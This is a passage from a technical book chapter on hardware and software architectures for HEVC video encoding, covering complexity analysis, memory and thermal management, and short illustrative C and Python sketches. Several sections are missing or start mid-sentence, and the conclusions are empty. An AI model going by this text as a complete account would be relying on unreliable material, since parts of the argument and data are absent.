implanted MOSFET’s with very small physical dimensions. IEEE J Solid-State Circuits
Esmaeilzadeh H, Blem E, St. Amant R, Sankaralingam K, Burger D (2011) Dark silicon and the
end of multicore scaling. SIGARCH Comput Archit News 39(3):365–376
Glew A (1998) MLP yes! ILP no. ASPLOS Wild and Crazy Idea Session
Intel Corporation (2022) Avalon® interface specifications. https://www.intel.com/content/www/us/
en/docs/programmable/683091/22-3/introduction-to-the-interface-specifications.html
Intel Corporation (2024a) Intel® Xeon® 6780E processor. https://ark.intel.com/content/www/us/
en/ark/products/240362/intel-xeon-6780e-processor-108m-cache-2-20-ghz.html
Intel Corporation (2024b) What is Intel® Turbo Boost Technology? https://www.intel.com/content/
www/us/en/gaming/resources/turbo-boost.html
JEDEC (2008) JEDEC standard: Double data rate (DDR) SDRAM, revision JESD79F. https://
www.jedec.org/system/files/docs/JESD79F_0.pdf
JEDEC (2023) JEDEC standard: DDR5 unbuffered dual inline memory module (UDIMM)
common standard, revision JESD308A, version 1.1. https://www.jedec.org/system/files/docs/
JESD308A.pdf
JEDEC (2024) DDR5 SDRAM, revision JESD79-5C.01. https://www.jedec.org
Karkhanis TS, Smith JE (2007) Automated design of application specific superscalar processors:
an analytical approach. SIGARCH Comput Archit News 35(2):402–411
Kroft D (1981) Lockup-free instruction fetch/prefetch cache organization. In: International
Symposium on Computer Architecture (ISCA), pp 81–87
Moore GE (2006) Cramming more components onto integrated circuits, reprinted from electronics.
IEEE Solid-State Circuits Soc Newsl
PCI-SIG. PCI-SIG® announces PCI Express® 7.0 specification to reach 128 GT/s. https://www.
businesswire.com/news/home/20220621005137/en
PCI-SIG. PCI-SIG® announces upcoming PCI Express® 6.0 specification to reach 64 GT/s. https://
www.businesswire.com/news/home/20190618005945/en/PCI-SIG-Announces-Upcoming-
PCI-Express-6.0-Specification-to-Reach-64-GTs
Shao S, Wang E (2019) Die photo analysis. https://web.archive.org/web/20190518112600/http://
vlsiarch.eecs.harvard.edu/research/accelerators/die-photo-analysis/
Part II
Application-Specific Processors
Architectures for Multimedia Processing:
A Cross-Layer Perspective
7
Muhammad Shafique and Bharath Srinivas Prabakaran
Contents
Introduction and Overview of Video Codecs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 216
High Efficiency Video Coding . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
Overview of the Standard . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
Analysis of Computational Complexity, Memory Requirements, and
Processor Temperature . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 220
Hardware and Software Architectures for Video Coding . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 224
Complexity Reduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 227
Low-Power Memory Architectures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 227
Workload Balancing for Multiple Video Tiles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 229
Dynamic Thermal Management for HEVC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 229
Future Directions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232
Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 234
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 234
M. Shafique ()
Engineering Division, New York University Abu Dhabi, Abu Dhabi, United Arab Emirates
e-mail: [email protected]
B. S. Prabakaran
Institute of Computer Engineering, Technische Universität Wien (TU Wien), Vienna, Austria
e-mail: [email protected]
Introduction and Overview of Video Codecs
Until the late 1950s, “moving pictures,” or videos, could be stored only as analog
signals in magnetic tapes, which were meant for playback in mechanical or cathode-
ray tube-based (CRT) television (TV) systems. However, with the digital revolution,
new techniques were used to create digital videos, which could not compete with
analog videos of the time due to their infeasibly high bitrate, thereby hindering
their large-scale adoption. The first generation of practical digital videos was made
possible using a lossy compression technique called Discrete Cosine Transform
(DCT). A number of companies including Toshiba and Hitachi used DCT-based
algorithms to develop the first video coding standard, H.261 (Hanzo et al. 2007).
Since then, DCT has been a major component of all video coding standards that
followed the H.261, including the latest H.266 or Versatile Video Coding (VVC)
standard (Wien and Bross 2020), established in 2020.
Even though ultra-high-definition, or 4K, is expected to be the next video
standard for broadcasting services, the current generation of TV systems, from
manufacturers like Samsung and LG, can already display up to 12K resolution
videos. These videos require massive amounts of memory and bandwidth, in RAW
formats, which make them unsuitable as a standard for video streaming or television
broadcasting services. Figure 1 illustrates an overview of rising video resolutions
and their corresponding memory requirement per frame in RAW format. 16K
resolution videos, on average, require more than 12 million bytes per frame, which
leads to the generation of over 3.3 GB of data for a 10-s video at 30 frames per
second (FPS). Therefore, each new video coding standard is expected to achieve a
higher level of compression to ensure that higher-resolution videos can be streamed
on demand, over the Internet, or for broadcasting TV programs. The H.264 standard
or Advanced Video Coding (AVC), which is currently the most-used video codec
with a market share of 91% (Bitmovin 2019), was successful in reducing the bitrate
by 2× when compared to its predecessor, H.263, while supporting only up to 4K
resolution videos. Similarly, H.265, or High Efficiency Video Coding (HEVC),
and VVC were able to further achieve ~2× compression in comparison to their
predecessors.
Fig. 1 Illustration of quadratically increasing memory per frame for common video resolutions
Fig. 2 An overview of the application category breakdown of global Internet traffic and mobile
data volume: video applications account for 60.6% of traffic, web browsing for 13.1%, gaming for
8.0%, and social networking for 6.1% (based on the data reported in Statista Research Department
2021 and Sandvine 2019)
High Efficiency Video Coding
Overview of the Standard
HEVC is the successor to the widely used AVC, which can achieve up to 2× better
data compression or substantially improved bitrate at the same file size. The changes
to HEVC include expansion of Coding Tree Units (CTUs) (the individual sub-
blocks of each frame that are used for pattern and difference comparison) from
16 × 16 to 64 × 64 pixels, improved motion compensation and motion estimation,
and improved variable block segmentation (Shafique and Henkel 2014). Figure 3
provides an overview of the HEVC standard and the associated operations involved
in each stage. A key operation of HEVC is hybrid encoding, which involves
exploiting input data redundancy by identifying intra-frame (spatial) and inter-
frame (temporal) correlations using the prediction block to compress the input video
stream. The I-frame, the initial frame of the input stream, is encoded solely using
spatial correlations and acts as a reference for future inter-frame predictions. The
sum-of-absolute-difference (SAD) values for each CTU, with respect to their inter-
frame and intra-frame correlations, are computed to estimate the motion vector,
which can then be used for motion estimation (ME) and motion compensation. The
motion vector is subsequently scaled, quantized, and transformed using the Context
Adaptive Binary Arithmetic Entropy Encoder, which is transmitted to the decoder,
along with the prediction information and the partitioning scheme. The picture is
reconstructed by reducing the blocking artifacts using the deblocking and sample
7 Architectures for Multimedia Processing: A Cross-Layer Perspective 219
Fig. 3 Overview of the High Efficiency Video Coding (HEVC) Standard (see more details
in Sullivan et al. 2012)
adaptive offset filter. The picture is subsequently stored in buffers to aid in motion-
vector predictions.
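At the core of motion estimation is the SAD computation mentioned above; a plain C version is sketched below (real encoders vectorize and heavily prune this kernel, and the block geometry parameters are illustrative).

#include <stdint.h>
#include <stdlib.h>

/* Sum of absolute differences between the current block and one
 * candidate block in the reference frame. */
unsigned sad_block(const uint8_t *cur, const uint8_t *ref,
                   int stride, int width, int height) {
    unsigned sad = 0;
    for (int y = 0; y < height; y++)
        for (int x = 0; x < width; x++)
            sad += (unsigned)abs(cur[y * stride + x] - ref[y * stride + x]);
    return sad;
}
/* Motion search evaluates sad_block() for every candidate offset inside
 * the search window; the offset with the smallest SAD becomes the
 * motion vector for the block. */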
Similar to the 16 × 16 blocks in AVC, HEVC deploys analogous Coding Tree
Units (CTUs) composed of luma and chroma Coding Tree Blocks (CTBs). As
discussed earlier, CTBs can have dimensions ranging from 16 × 16 up to 64 × 64 to
ensure larger resolution video streams can be compressed appropriately. The CTBs
are recursively partitioned using a quadtree structure, where each leaf is associated
with a Coding Unit (CU), which is further partitioned into multiple Prediction Units (PUs)
and Transform Units (TUs), based on whether the algorithm decides to use inter-
or intra-frame prediction to encode the frame. Figure 4a illustrates an overview of
the CTU partitioning into CUs, PUs, and TUs. Partitioning into PUs and TUs, or
even further partitioning, may be performed at the CU level to further compress the
videos. The dimensions of PU and TU can range from 64 × 64 to 4 × 4 and 32 × 32
to 4 × 4, respectively. HEVC also deploys Rate Distortion Optimization (RDO),
which evaluates all combinations of CU, PU, and TU to determine the optimal
partitioning that can achieve high compression efficiency. Each PU is evaluated
for the 35 different intra-frame prediction modes, which are used to effectively
eliminate spatial redundancy. The best prediction mode is selected by HEVC after
the RDO decision at the cost of higher computational load caused by the increased
search space.
Fig. 4 (a) Quadtree partitioning of Coding Tree Units in HEVC; (b) Example of slices and tiles
of a frame in HEVC for error resilience and parallel processing, respectively
However, the most complex processing stage in HEVC is the inter-frame pre-
diction block, which is composed of motion estimation and motion compensation.
This stage employs two interpolation filters that are responsible for quarter-sample
precision motion compensation and fractional-pixel motion estimation. In the
motion estimation stage of HEVC, the algorithm searches for a block inside the
search window of the reference frame, using the SAD value to identify the motion
vector. The reference frame is stored either on-chip or off-chip, based on the quality-of-service requirements of the application and the associated system constraints. This stage is highly memory-intensive, and its memory accesses account for nearly 70% of the total energy consumed by the ME stage of HEVC (Sampaio et al. 2014).
To ensure higher error resilience, a frame can be divided into several slices
(sequences of CTUs), which are raster scanned while ensuring that the predictions
are not performed across slice boundaries. Tiles, on the other hand, are responsible
for enabling parallel processing without any thread or workload synchronization.
Figure 4b illustrates an example of slices and tiles on a video frame. Each tile is
a rectangular group of CTUs, which can be independently processed on different
cores of a processor without any interdependencies. However, since different
CTUs of an image can vary in terms of composition and motion properties, the
workload of each core may increase or decrease based on the tile assigned to the
core. Therefore, the partitioning, mapping, and processing of tiles on cores and
accelerators while considering the workload and its computational complexity and
memory requirements are quite instrumental to the development of energy-efficient
architectures and platforms.
The total number of predictions (β) for a CTU of dimensions M × M, provided that
a CTU is partitioned into multiple CUs, is defined as:
$$
\beta = \sum_{i=0}^{\log_2(M)-2} 2^{2i} \times N_i \tag{1}
$$

where $N_i$ can either denote the total number of candidates for the motion search of CU size $i$ or the total number of intra-frame prediction modes evaluated for the CTU. As discussed earlier, due to the RDO, all possible combinations of PUs are evaluated to identify the best CU structure for the CTU under consideration. The 64 × 64 block structure of the CTU results in 7808 predictions for the intra-frame prediction process, which translates to roughly 2.65× the number of predictions in AVC.

[Fig. 5 panels: (a) PUs overlaid on a frame; (b) percentage of image area per PU size (64×64, 32×32, 16×16, 8×8) for resolutions 832×480, 1920×1080, 2560×1600 and QP ∈ {22, 30, 38}]
Fig. 5 (a) Illustration of the PUs on the initial frame of a template sequence; (b) percentage of image area occupied by given PU dimensions for different videos and quantization parameter values
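As a quick sanity check of Eq. (1), the sketch below evaluates β for a 64 × 64 CTU; the per-level candidate counts N_i are hypothetical placeholders, since the actual values depend on the encoder configuration:

```python
import math

def prediction_count(M: int, N: list) -> int:
    """Evaluate beta = sum_{i=0}^{log2(M)-2} 2^(2i) * N_i  (Eq. 1).
    N[i] is the number of candidates evaluated at quadtree level i."""
    levels = int(math.log2(M)) - 2 + 1  # i runs from 0 to log2(M)-2 inclusive
    assert len(N) == levels
    return sum((2 ** (2 * i)) * N[i] for i in range(levels))

# Hypothetical per-level candidate counts for a 64x64 CTU (5 levels, i = 0..4);
# the quadratic 2^(2i) weight shows why small block sizes dominate the count.
print(prediction_count(64, [35, 35, 35, 35, 35]))
```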
Figure 5a illustrates the partitioning of the initial frame of a template sequence after the RDO stage in HEVC. The figure clearly shows that larger PU dimensions are used for encoding low-variance, homogeneous regions, whereas smaller blocks are used to encode high-variance, heterogeneous regions. Figure 5b provides a more comprehensive breakdown of the percentage of image area occupied by different PU dimensions across quantization parameter (QP) values and video sequences.
At lower quantization levels, the texture and variations are more comprehensively
captured using smaller PU blocks, with little to no large-sized PUs. Increasing
the QP value, on the other hand, introduces a level of smoothing that reduces the
quality of the image by increasing the number of large-sized PUs. This observation
can be leveraged to research and develop an application-level complexity reduction
technique that can reduce the hardware overhead of HEVC.
Vanne et al. (2012) and Bossen et al. (2012) have performed comprehensive complexity analyses of the HEVC system, identifying that three interpolation filters are responsible for 15%–38% of the total time required for encoding and decoding. These filters generate the half- and quarter-pixel positions of the luma samples and the eighth-pixel positions of the chroma samples of the frame. Figure 6a illustrates that the interpolation
filters, on average, consume 25% of the total execution time of the system, which
varies depending upon the quantization parameter and the characteristics of the
video sequence under consideration.
[Fig. 6 plots: (a) execution-time percentage vs Quantization Parameter (QP) values 22, 27, 32, 37; (b) number of interpolation-filter calls vs frame number (0–160) in two video sequences]
Fig. 6 (a) Percentage execution time of interpolation filter in HEVC encoder; (b) number of calls
to the interpolation filter for each frame in two different video sequences. (Adapted from Shafique
and Henkel 2014)
Figure 6b also illustrates the variation in the number of calls to the interpolation filters for two different video sequences, thereby motivating the need for interpolation filters that adapt to the video sequence's properties.
In addition to its high computational load, the memory bandwidth of an HEVC system is, on average, 2× higher than that of the H.264 encoder, as illustrated in Fig. 7a. The box plots in Fig. 7b summarize the memory
access percentages for three different search window sizes (32 × 32, 64 × 64,
and 128 × 128) and four video sequences. Based on this analysis, the estimated
number of memory accesses of the HEVC encoder system is ~3.86× more than
that of AVC. Therefore, the HEVC encoder requires more memory bandwidth and
memory accesses, thereby exerting higher pressure on the memory architecture
when compared to AVC, which is due to the quadtree partitioning of CTUs
into multiple CUs and the video tiling processes that enable parallel processing.
Figure 7b also illustrates the variation in the percentage of memory accesses for
[Fig. 7 plots: (a) memory bandwidth [GB/s] of the AVC and HEVC encoders at HD, FHD, and 2K resolutions; (b) box plots (minimum, 25%, median, 75%, maximum) of the percentage of memory accesses for TZ search on the Keiba, Basketball, Racehorse, and Kristen sequences]
Fig. 7 (a) Memory bandwidth requirement for the HEVC and AVC encoder systems; (b)
percentage statistics of block matching memory accesses for TZ search in HEVC. (Adapted
from Shafique and Henkel 2014)
Fig. 8 (a) Variation in processor temperature of two different video sequences; (b) processor
temperature analysis using frequency scaling on low motion sequence; (c) temperature analysis
of processor using video tiling and execution on two cores. (Adapted from Shafique and Henkel
2014)
[Fig. 9 diagram (caption not recovered): compute tiles with processor cores, hardware monitors, and routers (R) attached to a memory bus]
platform and quality constraints of the system, like the frame rate (Grellert et al.
2013). This is followed by the execution of various power management algorithms,
which are used to curtail the computations of the workload and/or to identify the
correct mode of operation and system configuration of the HEVC encoder that
satisfies the requirements and constraints, such as the energy budget of a battery-
operated device, while ensuring minimal quality loss (Khan et al. 2013a,b). Khan
et al. (2014) have also proposed a video tile formation technique, which enacts
intricate policies to ensure that the generated workload is balanced over different
compute tiles (see Fig. 9 for more details).
At the hardware layer, a heterogeneous many-core architecture is envisioned
where each core is denoted as a compute tile and is composed of (1) at least one
general purpose microprocessor, which can execute the HEVC encoder software
stack, (2) multiple hardware accelerators, like SAD arrays, interpolation filters,
prediction blocks, etc., to ensure real-time processing and throughput (Diniz et al. 2013; Khan et al. 2013a,b; Sampaio et al. 2014; Zatt et al. 2011b), which are intertwined as co-processors on the compute tile (Diniz et al. 2013), and (3) video memories
with data-aware dynamic power management (DPM) capabilities (Sampaio et al.
2014; Khan et al. 2013b). Figure 10 illustrates the hardware requirements for the
interpolation filters of HEVC by synthesizing them on the Xilinx XC5VLX110T-
2ff1136 FPGA. The hardware techniques investigated in Sampaio et al. (2014)
and Khan et al. (2013b) shift the control and power management system to the
software and application layer. The software layer is supplemented with run-time hardware measurements, like the frame rate, throughput, and power consumption, thereby enabling workload budgeting, complexity reduction, energy-quality trade-offs, etc.
The inherent error resilience of the video coding application has also been exploited
to design approximate accelerators for motion estimation (El-Harouni et al. 2017)
and STT-RAM-based memory hierarchies (Sampaio et al. 2015; Teimoori et al.
2018) to achieve high energy efficiency.
Fig. 10 Hardware results for interpolation filters on Xilinx FPGA for varying number of datapaths
Complexity Reduction
Limiting the total number of CU partitions can drastically reduce the complexity of the HEVC encoder. Based on a preliminary analysis of the input video stream that identifies the variance properties of different objects, the approach successfully determines a set of CU sizes most suitable for the scenario, thereby reducing the overhead of the full RDO mode decision. Based on the preliminary analysis illustrated
in section “Analysis of Computational Complexity, Memory Requirements, and
Processor Temperature”, which discussed the dependence of CU dimensions on the
variance of the input stream, a variance-aware CU/PU mode prediction technique
has been developed. Initially, the variance of the CTU, at the 4 × 4 sublevel,
is estimated. This information is used to recursively merge similar neighboring
blocks, based on their variance, to create bigger blocks and partitions. This process
is repeated until the point where there are no more blocks left to be merged, at
which point we are left with a “PU Map,” which is used for evaluating the PU size
predictions. This also eliminates the need for multiple CU/PU dimension evaluation
as the PU map dimension evaluations prove to be sufficient in most cases. To further
lower the risk of misprediction, an additional PU map, the “PU Map Above,” is generated, which denotes the PU map one level above the current node in the quadtree partitioning
structure, as shown in Fig. 11. The approach is successful in achieving a speedup
of 44%, on average, and energy reductions of 35% while incurring a negligible
loss of −0.048 dB output quality (BD-PSNR (Bjontegaard 2001)). This complexity
reduction technique is orthogonal to other complexity reduction mechanisms like
early-stage TU/PU partitioning and intra-frame angular direction prediction.
Fig. 11 Overview of the approach used to select the best CU dimensions and locations
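A minimal sketch of this variance-driven merging follows; the similarity threshold and the 2 × 2 merge rule are illustrative assumptions, and the published technique additionally derives the “PU Map Above” and couples the maps to the encoder's mode decision:

```python
import numpy as np

def variance_map(ctu: np.ndarray, blk: int = 4) -> np.ndarray:
    """Per-4x4-block variance of a CTU (e.g. a 64x64 luma block)."""
    h, w = ctu.shape
    v = np.empty((h // blk, w // blk))
    for i in range(0, h, blk):
        for j in range(0, w, blk):
            v[i // blk, j // blk] = ctu[i:i + blk, j:j + blk].var()
    return v

def merge_level(v: np.ndarray, thresh: float) -> np.ndarray:
    """Merge 2x2 groups of neighbouring blocks with similar variances,
    producing the map one quadtree level up; np.inf marks groups that must
    stay split. Repeated application yields a 'PU Map'-style size map."""
    h, w = v.shape
    out = np.empty((h // 2, w // 2))
    for i in range(0, h, 2):
        for j in range(0, w, 2):
            quad = v[i:i + 2, j:j + 2]
            if np.isinf(quad).any() or quad.max() - quad.min() >= thresh:
                out[i // 2, j // 2] = np.inf   # children differ: stay split
            else:
                out[i // 2, j // 2] = quad.mean()
    return out

# Usage: 64x64 CTU -> 16x16 variance map, merged up to the 64x64 PU level.
ctu = np.random.default_rng(0).integers(0, 256, (64, 64)).astype(float)
m = variance_map(ctu)
while m.shape[0] > 1:
    m = merge_level(m, thresh=50.0)
```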
input video streams. For instance, large reference video frames are repeatedly loaded into on-chip memory during the motion search process, which leads to high power consumption both in the on-chip memories and from the repeated memory accesses. These problems can be addressed either by (1) reducing the number of repeated off-chip memory accesses by exploring effective data-reuse techniques, such as motion trajectory prediction, which can be exploited to design and manage application-specific on-chip memories (Sampaio et al. 2014; Shafique and Henkel 2011; Zatt et al. 2011a,b), or by (2) leveraging next-generation memory technologies that overcome the volatility limitations of SRAM, such as MRAM, which drastically reduces the leakage power of a cell by ~5.4× while incurring a
2.6× higher write latency and nearly 20× higher dynamic power during the write
cycle.
Instead of exploring these two approaches individually, Khan et al. (2013b) proposed to combine the benefits of both by designing a hybrid memory architecture that combines SRAM and NVMs with an adaptive energy management system called AMBER, as illustrated in Fig. 12a. To enable low read latency for CTUs and hide the long latency of MRAM writes, a small SRAM-
based memory is included on-chip. The CTUs fetched from off-chip memory are
simultaneously written to the SRAM-based memory and MRAM, which can be
subsequently used for repeated future accesses during the motion estimation stage.
The MRAM buffers are divided into multiple sectors on the chip, which can be
individually clock-/power-gated based on the memory requirement of the video
stream/application, to reduce power consumption. Due to their non-volatility, MRAMs
retain the data when power-gated, making them highly suitable for such hybrid
memory architectures. The proposed power manager is a self-organizing map-
based learner, which adapts itself, without any supervision, to changing memory
patterns and effectively reduces power consumption when compared to the state
of the art, as illustrated in Fig. 12b. However, since AMBER does not support
the bandwidth required for processing multiple tiles in parallel with concurrent
memory access, Sampaio et al. (2014) proposed a distributed scratchpad-based
video memory for HEVC. This technique employs a data-driven dynamic power
management tool that reduces energy consumption by up to 61% compared to
[Fig. 12: (a) block diagram of the AMBER system — HEVC encoder and block matching, power control unit, search-window MRAM (normally OFF) and SRAM (always ON) buffers, and accelerators for off-chip DRAM data fetch; (b) power consumption [W] comparison for 4 reference frames]
Fig. 12 (a) Overview of the proposed AMBER memory system; (b) illustration of power savings
achieved by the AMBER system
state-of-the-art solutions, while also reducing the on-chip leakage energy by 54% by incorporating application-specific knowledge.
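The dual-write/read policy behind such hybrid memories can be sketched as follows; this is a toy model with invented class and method names, and the actual AMBER design adds sector-level clock/power gating driven by a self-organizing-map learner:

```python
class HybridVideoMemory:
    """Toy model of an SRAM+MRAM hybrid buffer: CTUs fetched from off-chip
    DRAM are written to both memories; reads are served from the small SRAM
    when possible, hiding the long MRAM write latency described above."""

    def __init__(self, sram_capacity: int):
        self.sram = {}            # small, fast, volatile
        self.mram = {}            # large, non-volatile, slow writes
        self.sram_capacity = sram_capacity

    def fetch_from_dram(self, ctu_id, data):
        # Simultaneous write to SRAM and MRAM on an off-chip fetch.
        if len(self.sram) >= self.sram_capacity:
            self.sram.pop(next(iter(self.sram)))  # naive FIFO eviction
        self.sram[ctu_id] = data
        self.mram[ctu_id] = data

    def read(self, ctu_id):
        # Repeated motion-estimation accesses hit the SRAM first, then MRAM.
        if ctu_id in self.sram:
            return self.sram[ctu_id]
        return self.mram.get(ctu_id)  # survives power gating (non-volatile)
```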
[Fig. 13 plots: per-tile processing time [msec] (100–180) over frames 1–49 for Tiles 0, 1, 3, and 4, showing that the workload is not constant for each tile and changes over time; adaptation panels plotting frequency [GHz], memory [Kbytes], and the number of modes over frames 0–45]
Fig. 13 (a) Time required for processing each tile with four tiles per frame using the RaceHorses sequence; (b) the adaptive workload balancing technique for many-core processors; (c) adaptation analysis for two different tiles in Exit. (Adapted from the data presented in Shafique and Henkel 2014)
[Fig. 14 plots: PSNR/bitrate and peak temperature (°C) over frames for No DTM and DTM thresholds of 54 °C, 50 °C, and 46 °C]
Fig. 14 (a) Maximum, average, and minimum processor temperature for encoding Keiba; (b)
comparison of temperature profile for DTM and non-DTM approaches. (Adapted from Shafique
and Henkel 2014)
Future Directions
Since their inception, “moving pictures” have been consumed by users in a variety of
ways, starting from film projectors in the 1900s all the way up to in-home streaming
using on-demand over-the-top (OTT) media service providers like Netflix, YouTube,
Amazon Prime, etc. These OTT ventures, which were growing steadily due to their
on-demand accessibility and comfort of home use, started registering exponential
growth when the COVID-19 pandemic hit and people were confined to their homes
without any other entertainment options (World Health Organization 2021). For
instance, the number of paid OTT subscribers in India increased by 30% to more
than 30 million in a span of 5 months, from March to July 2020, when lockdown
was instituted in the country (Financial Express 2020). Similar trends were observed
in almost all the countries where extended periods of lockdown were instituted in
order to reduce the spread of the novel coronavirus (Matthew Ball 2020). These
OTT ventures, which rely on the H.264 and HEVC video standards to transmit high-resolution videos, require hardware-level acceleration support and high bandwidth to enable real-time streaming, as discussed in section “Introduction and Overview of Video Codecs”. These requirements become even more important as the next generation of video coding standards, such as the VVC standard, is devised, since they are likely to demand even higher computational power and bandwidth.
Besides on-demand entertainment, videos are dominating domains like virtual and augmented reality, where content is encoded as 360-degree video (Bross et al. 2021; Zhou et al. 2019), gaming (Zadtootaghaj et al. 2018), and video confer-
encing (Wang et al. 2021), and many other applications. Each of these applications
is accompanied by research challenges highly specific to the application use case.
For example, the hardware resources available on a VR headset should be capable of rendering 360-degree 4K-resolution videos at 60+ FPS in real time while remaining compact and neither consuming too much power nor generating excessive heat, which can cause discomfort to the user. Similarly, the quality and frame rate requirements
of online gaming platforms are satisfied using specialized Graphics Processing
Units (GPUs), which can handle the memory bandwidth and highly parallelized
compute requirements of sophisticated gameplay that changes in real time based
on user controls. The next steps to realize such ventures would be to investigate,
research, and develop hardware-software solutions to meet the requirements of such
use cases, potentially using a modified version of the methodology presented in
section “Hardware and Software Architectures for Video Coding”.
More recently, several scientific advancements in computing, like near-memory computing (Singh et al. 2019) and deep learning (LeCun et al. 2015), have also had a major impact on the video coding domain. Lesniak et al. (2021) have
proposed a novel high-bandwidth memory (HBM) interfaced processor architecture
that can enable hardware-accelerated execution for applications like video coding
and encryption, which require high memory bandwidth. Besides HBMs, Resistive
Random-access Memories (ReRAM) and associated cross-bar architectures have
proven to be quite beneficial in performing in-memory computing for large-
scale data processing applications like deep learning (Chi et al. 2016). These
architectures could also be quite useful for video coding applications once the cost
and performance benefits associated with their fabrication and their data reliability
challenges are addressed.
Likewise, the deep learning paradigm has enabled a whole slew of advances in the computer vision domain, which has enabled a wide range of features in
autonomous driving, robotics, etc. For instance, Deep Neural Networks have proven
to be state of the art in Computer Vision (like image detection, recognition, and
segmentation), Natural Language Processing (like speech recognition, machine
translation, and sentiment analysis), Medical Assistance (tumor segmentation,
diagnostics, and drug discovery), and many other applications. Deep learning has
also invaded the video coding domain; Wang et al. (2021) have leveraged the
capabilities of Deep Neural Networks and their proposed keypoint representation
technique to reduce the bandwidth requirement for video conferencing applications
by 10×, when compared to the H.264 video coding standard. Their technique can
also be used to synthesize a pseudo-realistic face-to-face experience during video
conferencing.
Therefore, it is in the best interest of researchers worldwide to investigate
novel and upcoming scientific advancements to address the challenges associated
with the video coding domain and its applications in fields like video archiving,
OTT content streaming, video surveillance, computer vision, robotics, autonomous
driving, human-computer interaction, etc. to improve the quality of service.
Conclusions
Acknowledgments We would like to explicitly thank Felipe Sampaio, Bruno Zatt, Sergio Bampi,
Daniel Palomino, Muhammad Usman Karim Khan, and Jörg Henkel for their contributions to
parts of the works cited in this chapter. We would also like to thank other researchers in industry
and academia alike, especially the ones cited in this work, who contributed to this field to enable
advancements that helped us realize the potential of video coding across multiple domains.
References
Bitmovin (2019) Video developer report. https://bitmovin.com/bitmovin-2019-video-developer-
report-av1-codec-ai-machine-learning-low-latency/
Bjontegaard G (2001) Calculation of average PSNR differences between RD-curves. VCEG-M33
Bossen F, Bross B, Suhring K, Flynn D (2012) HEVC complexity and implementation analysis.
IEEE Trans Circuits Syst Video Technol 22(12):1685–1696
Bross B, Chen J, Ohm JR, Sullivan GJ, Wang YK (2021) Developments in international video
coding standardization after AVC, with an overview of versatile video coding (VVC). In:
Proceedings of the IEEE
Chi P, Li S, Xu C, Zhang T, Zhao J, Liu Y, Wang Y, Xie Y (2016) Prime: a novel processing-
in-memory architecture for neural network computation in reram-based main memory. ACM
SIGARCH Comput Archit News 44(3):27–39
Diniz CM, Shafique M, Bampi S, Henkel J (2013) High-throughput interpolation hardware archi-
tecture with coarse-grained reconfigurable datapaths for HEVC. In: 2013 IEEE international
conference on image processing. IEEE, pp 2091–2095
El-Harouni W, Rehman S, Prabakaran BS, Kumar A, Hafiz R, Shafique M (2017) Embracing
approximate computing for energy-efficient motion estimation in high efficiency video coding.
In: Design, automation & test in Europe conference & exhibition (DATE), 2017. IEEE,
pp 1384–1389
Financial Express (2020) Rise of paid subscribers. https://www.financialexpress.com/brandwagon/
2020-rise-of-paid-subscribers/2172942/
Grellert M, Shafique M, Khan MUK, Agostini L, Mattos JC, Henkel J (2013) An adaptive workload
management scheme for HEVC encoding. In: 2013 IEEE international conference on image
processing. IEEE, pp 1850–1854
Hanzo L, Cherriman P, Streit J (2007) Video compression and communications: from basics to H.261, H.263, H.264, MPEG4 for DVB and HSDPA-style adaptive turbo-transceivers. Wiley,
Hoboken
Javaid H, Shafique M, Parameswaran S, Henkel J (2011) Low-power adaptive pipelined MPSoCs for multimedia: an H.264 video encoder case study. In: 2011 48th ACM/EDAC/IEEE design
automation conference (DAC). IEEE, pp 1032–1037
Khan MUK, Shafique M, Grellert M, Henkel J (2013a) Hardware-software collaborative complex-
ity reduction scheme for the emerging HEVC intra encoder. In: 2013 design, automation & test
in Europe conference & exhibition (DATE). IEEE, pp 125–128
Khan MUK, Shafique M, Henkel J (2013b) An adaptive complexity reduction scheme with fast
prediction unit decision for HEVC intra encoding. In: 2013 IEEE international conference on
image processing. IEEE, pp 1578–1582
Khan MUK, Shafique M, Henkel J (2014) Software architecture of high efficiency video coding
for many-core systems with power-efficient workload balancing. In: 2014 design, automation
& test in Europe conference & exhibition (DATE). IEEE, pp 1–6
Khan MUK, Shafique M, Bauer L, Henkel J (2015) Multicast FullHD H.264 intra video encoder
architecture. IEEE Trans Comput-Aided Des Integr Circuits Syst 34(12):2049–2053
Khan MUK, Shafique M, Henkel J (2017) Energy efficient embedded video processing systems: a
hardware-software collaborative approach. Springer, Berlin
LeCun Y, Bengio Y, Hinton G (2015) Deep learning. Nature 521(7553):436–444
Lesniak F, Kreß F, Becker J (2021) Transparent near-memory computing with a reconfigurable
processor. In: International symposium on applied reconfigurable computing. Springer, pp 221–
231
Matthew Ball (2020) The impact of COVID-19 on pay-tv and ott video. https://www.matthewball.
vc/all/covidvideo
Palomino D, Shafique M, Amrouch H, Susin A, Henkel J (2014) HEVCDTM: application-driven
dynamic thermal management for high efficiency video coding. In: 2014 design, automation &
test in Europe conference & exhibition (DATE). IEEE, pp 1–4
Sampaio F, Zatt B, Shafique M, Agostini L, Henkel J, Bampi S (2013) Content-adaptive reference
frame compression based on intra-frame prediction for multiview video coding. In: 2013 IEEE
international conference on image processing. IEEE, pp 1831–1835
Sampaio F, Shafique M, Zatt B, Bampi S, Henkel J (2014) DSVM: energy-efficient distributed
scratchpad video memory architecture for the next-generation high efficiency video coding. In:
2014 design, automation & test in Europe conference & exhibition (DATE). IEEE, pp 1–6
Sampaio F, Shafique M, Zatt B, Bampi S, Henkel J (2015) Approximation-aware multi-level cells
STT-RAM cache architecture. In: 2015 international conference on compilers, architecture and
synthesis for embedded systems (CASES). IEEE, pp 79–88
